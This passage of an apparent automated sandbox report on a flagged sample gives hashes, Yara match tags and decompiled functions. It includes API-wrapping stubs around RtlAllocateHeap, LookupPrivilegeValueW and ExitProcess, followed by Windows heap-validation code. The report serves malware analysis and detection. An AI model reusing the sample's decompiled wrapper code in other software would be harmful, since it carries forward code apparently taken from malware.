                                      • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a047
                                      0x0041a05d
                                      0x0041a061

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a1ea
                                      0x0041a200
                                      0x0041a204

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                      0x0041a0b3
                                      0x0041a0ca
                                      0x0041a0d8

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 942374705548c59235baf6a65da7836c451c12d8c378c6dfc932fb5597993ec4
                                      • Instruction ID: 1f9380a66aec0e19289c2bd83f9060578bd04cfe647131373f06784e0277b68b
                                      • Opcode Fuzzy Hash: 942374705548c59235baf6a65da7836c451c12d8c378c6dfc932fb5597993ec4
                                      • Instruction Fuzzy Hash: 6DB09BB1D415C5C5D711D7A44748717794477D0745F26C066D2460681B4778C091F5F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 01A2B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                      Download Yara Rule
                                      Strings
                                      • an invalid address, %p, xrefs: 01A2B4CF
                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A2B3D6
                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A2B314
                                      • *** enter .cxr %p for the context, xrefs: 01A2B50D
                                      • *** then kb to get the faulting stack, xrefs: 01A2B51C
                                      • <unknown>, xrefs: 01A2B27E, 01A2B2D1, 01A2B350, 01A2B399, 01A2B417, 01A2B48E
                                      • read from, xrefs: 01A2B4AD, 01A2B4B2
                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A2B53F
                                      • Go determine why that thread has not released the critical section., xrefs: 01A2B3C5
                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01A2B2F3
                                      • a NULL pointer, xrefs: 01A2B4E0
                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A2B38F
                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A2B47D
                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A2B39B
                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A2B476
                                      • *** An Access Violation occurred in %ws:%s, xrefs: 01A2B48F
                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A2B2DC
                                      • This failed because of error %Ix., xrefs: 01A2B446
                                      • The critical section is owned by thread %p., xrefs: 01A2B3B9
                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A2B484
                                      • *** enter .exr %p for the exception record, xrefs: 01A2B4F1
                                      • The resource is owned shared by %d threads, xrefs: 01A2B37E
                                      • The resource is owned exclusively by thread %p, xrefs: 01A2B374
                                      • The instruction at %p tried to %s , xrefs: 01A2B4B6
                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A2B305
                                      • write to, xrefs: 01A2B4A6
                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A2B323
                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 01A2B352
                                      • *** Inpage error in %ws:%s, xrefs: 01A2B418
                                      • The instruction at %p referenced memory at %p., xrefs: 01A2B432
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                      • API String ID: 0-108210295
                                      • Opcode ID: d5d0f21453167f83ee2163ce93474f93b1d3249329e5fa9b61f77fa271b2d735
                                      • Instruction ID: 13d81fb27b0c286365fdf47b4c02860f079f8211a4bfb5ca9d0c038c3a45ea53
                                      • Opcode Fuzzy Hash: d5d0f21453167f83ee2163ce93474f93b1d3249329e5fa9b61f77fa271b2d735
                                      • Instruction Fuzzy Hash: C8812035A00220FFDB22AF5EDC89E7B3F7AAF96B51F444048F5082B552D3618411EBB2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A31C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 44%
                                      			E01A31C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x19548a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0197B150();
				} else {
					E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1a6589c);
				E0197B150("Heap error detected at %p (heap handle %p)\n",  *0x1a658a0);
				_t27 =  *0x1a65898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01A31E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0197B150();
				} else {
					E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0197B150("Error code: %d - %s\n",  *0x1a65898);
				_t113 =  *0x1a658a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0197B150("Parameter1: %p\n",  *0x1a658a4);
				}
				_t115 =  *0x1a658a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0197B150("Parameter2: %p\n",  *0x1a658a8);
				}
				_t117 =  *0x1a658ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0197B150("Parameter3: %p\n",  *0x1a658ac);
				}
				_t119 =  *0x1a658b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1a658b4);
					E0197B150("Last known valid blocks: before - %p, after - %p\n",  *0x1a658b0);
				} else {
					_t120 =  *0x1a658b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0197B150();
				} else {
					E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0197B150("Stack trace available at %p\n", 0x1a658c0);
			}











                                      0x01a31c10
                                      0x01a31c16
                                      0x01a31c1e
                                      0x01a31c3d
                                      0x01a31c3e
                                      0x01a31c20
                                      0x01a31c35
                                      0x01a31c3a
                                      0x01a31c44
                                      0x01a31c55
                                      0x01a31c5a
                                      0x01a31c65
                                      0x01a31c67
                                      0x00000000
                                      0x01a31c6e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a31c67
                                      0x01a31cdc
                                      0x01a31ce5
                                      0x01a31d04
                                      0x01a31d05
                                      0x01a31ce7
                                      0x01a31cfc
                                      0x01a31d01
                                      0x01a31d0b
                                      0x01a31d17
                                      0x01a31d1f
                                      0x01a31d25
                                      0x01a31d30
                                      0x01a31d4f
                                      0x01a31d50
                                      0x01a31d32
                                      0x01a31d47
                                      0x01a31d4c
                                      0x01a31d61
                                      0x01a31d67
                                      0x01a31d68
                                      0x01a31d6e
                                      0x01a31d79
                                      0x01a31d98
                                      0x01a31d99
                                      0x01a31d7b
                                      0x01a31d90
                                      0x01a31d95
                                      0x01a31daa
                                      0x01a31db0
                                      0x01a31db1
                                      0x01a31db7
                                      0x01a31dc2
                                      0x01a31de1
                                      0x01a31de2
                                      0x01a31dc4
                                      0x01a31dd9
                                      0x01a31dde
                                      0x01a31df3
                                      0x01a31df9
                                      0x01a31dfa
                                      0x01a31e00
                                      0x01a31e0a
                                      0x01a31e13
                                      0x01a31e32
                                      0x01a31e33
                                      0x01a31e15
                                      0x01a31e2a
                                      0x01a31e2f
                                      0x01a31e39
                                      0x01a31e4a
                                      0x01a31e02
                                      0x01a31e02
                                      0x01a31e08
                                      0x00000000
                                      0x00000000
                                      0x01a31e08
                                      0x01a31e5b
                                      0x01a31e7a
                                      0x01a31e7b
                                      0x01a31e5d
                                      0x01a31e72
                                      0x01a31e77
                                      0x01a31e95

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                      • API String ID: 0-2897834094
                                      • Opcode ID: 7d1d338c0ddba7e2bfdd7d97c9954adb4a0ce42ecb7123956a22c3850a272fe1
                                      • Instruction ID: abdc947bb9ce42a6dc16a4be523c17f6ca55e225216659689cb3908515407696
                                      • Opcode Fuzzy Hash: 7d1d338c0ddba7e2bfdd7d97c9954adb4a0ce42ecb7123956a22c3850a272fe1
                                      • Instruction Fuzzy Hash: 1661B63A911285DFD712EB49E485F30B3F8FFC4970B0D806AF80E5B711E6249C518B2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A34AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 59%
                                      			E01A34AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0197B150();
						} else {
							E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0197B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E01A2FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0197B150();
						} else {
							E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0197B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0197B150();
									} else {
										E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0197B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E01A2FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0197B150();
										} else {
											E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E019CD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E01A3A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0199E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E01A3A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
